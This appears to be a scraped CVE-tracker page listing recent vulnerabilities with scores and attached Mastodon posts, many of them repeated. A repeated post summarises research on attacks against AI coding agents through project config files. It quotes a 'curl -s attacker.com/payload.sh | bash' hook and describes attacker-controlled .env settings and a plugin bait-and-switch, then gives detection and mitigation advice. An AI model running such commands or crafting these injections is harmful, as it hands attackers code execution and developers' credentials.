- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-22007
(2.9 LOW)

EPSS: 0.02%

updated 2026-04-22T15:31:39

1 posts

Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u481, 8u481-b50, 8u481-perf, 11.0.30, 17.0.18, 21.0.10, 25.0.2, 26; Oracle GraalVM for JDK: 17.0.18 and 21.0.10; Oracle GraalVM Enterprise Edition: 21.3.17. Difficult to exploit vulnerability allo

linux@activitypub.awakari.com at 2026-04-27T20:20:32.000Z ## Debian OpenJDK DSA-6231-1 Important Crypto Key Issues CVE-2026-22007 Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in incorrect generation of cryptograp...

#Debian #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-6770
(6.5 MEDIUM)

EPSS: 0.06%

updated 2026-04-22T15:07:23.650000

2 posts

Other issue in the Storage: IndexedDB component. This vulnerability was fixed in Firefox 150, Firefox ESR 140.10, Thunderbird 150, and Thunderbird 140.10.

1 repos

https://github.com/nightcorefan94/CVE-2026-6770

Mozilla@activitypub.awakari.com at 2026-04-27T11:36:33.000Z ## InfoSec News Nuggets 04/27/2026 Firefox Vulnerability Allows Tor User Fingerprinting Researchers disclosed CVE-2026-6770, an IndexedDB issue that can let sites correlate a user’s activity across ...

#InfoSec #News #Nuggets #AboutDFIR #Lotus #Wiper #news #nuggets #Pack2TheRoot

Origin | Interest | Match ##

Mozilla@activitypub.awakari.com at 2026-04-27T10:49:04.000Z ## Firefox bug CVE-2026-6770 enabled cross-site tracking and Tor fingerprinting CVE-2026-6770 let attackers fingerprint Firefox and Tor users, even in Private mode. Firefox 150 and Tor Browser 15.0.10...

#Breaking #News #Security #CVE-2026-6770 #fingerprinting #Firefox #Hacking #hacking #news #information #security

Origin | Interest | Match ##

CVE-2019-25714(CVSS UNKNOWN)

EPSS: 0.78%

updated 2026-04-21T18:32:04

1 posts

Seeyon OA A8 contains an unauthenticated arbitrary file write vulnerability in the /seeyon/htmlofficeservlet endpoint that allows remote attackers to write arbitrary files to the web application root by sending specially crafted POST requests with custom base64-encoded payloads. Attackers can write JSP webshells to the web root and execute them through the web server to achieve arbitrary OS comman

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-5965
(9.8 CRITICAL)

EPSS: 8.66%

updated 2026-04-21T06:30:32

1 posts

NewSoftOA developed by NewSoft has an OS Command Injection vulnerability, allowing unauthenticated local attackers to inject arbitrary OS commands and execute them on the server.

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-35177
(4.1 MEDIUM)

EPSS: 0.01%

updated 2026-04-20T18:28:03.593000

1 posts

Vim is an open source, command line text editor. Prior to 9.2.0280, a path traversal bypass in Vim's zip.vim plugin allows overwriting of arbitrary files when opening specially crafted zip archives, circumventing the previous fix for CVE-2025-53906. This vulnerability is fixed in 9.2.0280.

linux@activitypub.awakari.com at 2026-04-28T00:19:14.000Z ## Ubuntu 25.10 Vim Critical Code Exec Risk USN-8213-1 CVE-2026-35177 Several security issues were fixed in Vim.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-4747
(8.8 HIGH)

EPSS: 0.09%

updated 2026-04-20T13:47:31.163000

1 posts

Each RPCSEC_GSS data packet is validated by a routine which checks a signature in the packet. This routine copies a portion of the packet into a stack buffer, but fails to ensure that the buffer is sufficiently large, and a malicious client can trigger a stack overflow. Notably, this does not require the client to authenticate itself first. As kgssapi.ko's RPCSEC_GSS implementation is vulnerabl

2 repos

https://github.com/kaleth4/CVE-2026-4747

https://github.com/kaleth4/CVE-2026-4747-

grahamperrin@bsd.cafe at 2026-04-27T05:37:16.000Z ##

@bagder maybe edit your post to show his full name:

Devansh Batham.

In a post to Substack, Devansh (surname unknown, @chocolatemilkcultleader) is horribly mistaken about Claude, Carlini, and FreeBSD CVE-2026-4747.

Thanks.

Cc @sszuecs

#human #slop #confusion #AI #FreeBSD

##

CVE-2025-61260
(9.8 CRITICAL)

EPSS: 0.10%

updated 2026-04-17T15:24:57.753000

2 posts

A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers

hasamba at 2026-04-28T17:35:16.951Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI -2025-59536 -2025-61260 -2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2026-20148
(4.9 MEDIUM)

EPSS: 0.06%

updated 2026-04-17T15:09:46.880000

2 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to perform path traversal attacks on the underlying operating system and read arbitrary files. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by

AAKL at 2026-04-28T16:31:35.296Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/

##

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-20147
(9.9 CRITICAL)

EPSS: 0.28%

updated 2026-04-17T15:09:46.880000

2 posts

A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sen

AAKL at 2026-04-28T16:31:35.296Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/

##

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2026-5588(CVSS UNKNOWN)

EPSS: 0.01%

updated 2026-04-16T21:32:20

2 posts

: Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcpkix on all (pkix modules). PKIX draft CompositeVerifier accepts empty signature sequence as valid. This issue affects BC-JAVA: from 1.49 before 1.84.

AAKL at 2026-04-28T16:31:35.296Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/

##

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-29787
(0 None)

EPSS: 0.33%

updated 2026-04-15T00:35:42.020000

2 posts

`zip` is a zip library for rust which supports reading and writing of simple ZIP files. In the archive extraction routine of affected versions of the `zip` crate starting with version 1.3.0 and prior to version 2.3.0, symbolic links earlier in the archive are allowed to be used for later files in the archive without validation of the final canonicalized path, allowing maliciously crafted archives

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

CVE-2026-35414
(4.2 MEDIUM)

EPSS: 0.02%

updated 2026-04-02T18:31:50

2 posts

OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon scenarios involving a principals list in conjunction with a Certificate Authority that makes certain use of comma characters.

1 repos

https://github.com/dehobbs/cve_2026_35414

chrispy@chaos.social at 2026-04-28T15:51:14.000Z ##

@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3

Detail Description :
nvd.nist.gov/vuln/detail/CVE-2
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )

##

chrispy@chaos.social at 2026-04-28T15:51:14.000Z ##

@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3

Detail Description :
nvd.nist.gov/vuln/detail/CVE-2
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )

##

CVE-2026-32062
(7.5 HIGH)

EPSS: 0.14%

updated 2026-03-11T20:38:31

1 posts

### Summary `@openclaw/voice-call` (and the bundled copy shipped in `openclaw`) accepted media-stream WebSocket upgrades before stream validation. In reachable deployments, unauthenticated pre-start sockets could be held open and increase resource pressure. ### Affected Packages / Versions - `openclaw` (npm): vulnerable `<= 2026.2.21-2`, patched in `2026.2.22`. - `@openclaw/voice-call` (npm): vul

EUVD_Bot@mastodon.social at 2026-04-28T21:03:17.000Z ##

🚨 EUVD-2026-26108

📊 Score: 6.9/10 (CVSS v3.1)
📦 Product: OpenClaw, OpenClaw
🏢 Vendor: OpenClaw
📅 Updated: 2026-04-28

📝 OpenClaw before 2026.3.31 contains an incomplete fix for CVE-2026-32062 where the voice-call component parses large WebSocket frames before start validation. Remote attackers can send oversized pre-start WebSocket frames to cause resource consump...

🔗 euvd.enisa.europa.eu/vulnerabi

#cybersecurity #infosec #euvd #cve #vulnerability

##

CVE-2026-2526
(6.3 MEDIUM)

EPSS: 0.38%

updated 2026-02-18T21:31:21

1 posts

A vulnerability was found in Wavlink WL-WN579A3 up to 20210219. This impacts the function multi_ssid of the file /cgi-bin/wireless.cgi. Performing a manipulation of the argument SSID2G2 results in command injection. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

hackmag@infosec.exchange at 2026-04-27T18:00:04.000Z ##

⚪️ Kaspersky Lab experts discover vulnerability in Snapdragon chipsets

🗨️ Experts from Kaspersky ICS CERT have discovered a vulnerability in Qualcomm Snapdragon chipsets. The issue was found in the BootROM boot firmware, which is embedded at the hardware level. Chipsets from these series are widely used in smartphones, tablets, automotive…

🔗 hackmag.com/news/cve-2026-2526

#news

##

CVE-2025-12383(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-02-05T15:43:37

2 posts

In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignoring of critical SSL configurations - such as mutual authentication, custom key/trust stores, and other security settings. This issue may result in SSLHandshakeException under normal circumstances, but under certain conditions, it could lead to unauthorized trust in insecure servers (see PoC)

AAKL at 2026-04-28T16:31:35.296Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/

##

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-68161
(4.8 MEDIUM)

EPSS: 0.03%

updated 2026-01-20T01:15:55.067000

2 posts

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName configuration attribute or the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html

AAKL at 2026-04-28T16:31:35.296Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/

##

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-68705(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-01-07T21:34:38

2 posts

# RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**: - **Severity**: Critical (CVSS estimated 9.9) - **Impact**: Arbitrary File Read/Write - **Component**: `/rustfs/rpc/read_file_stream` endpoint - **Root Cause**: Insufficient path validation in `crates/ecstore/src/disk/local.rs:1791` ### Vulnerable Code ```rust // local.rs:1791 - No path sanitization! let file_path =

1 repos

https://github.com/imjdl/CVE-2025-68705

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

